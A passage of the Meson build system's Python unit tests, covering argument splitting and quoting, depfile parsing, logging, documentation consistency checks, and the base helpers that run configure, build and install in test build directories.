# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
            # line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
        errors = []  # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
        Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
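# Record every file shipped in a mesonbuild data dir as a (relative posix path, sha256) pair.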
data_files = [] # type: T.List[T.Tuple[str, str]]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
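# samu (samurai) is a ninja-compatible build tool that prints a different "nothing to do" message.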
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path; otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail
# loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
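# Install into a DESTDIR inside the build dir so that tests never write to the real prefix.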
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
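# Make sure the backend will notice that the configuration changed before the next build.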
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# substitute them back in as the command for each compile command in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of the command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
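# The output ends with a newline, so the final status message is the second-to-last element after split().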
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
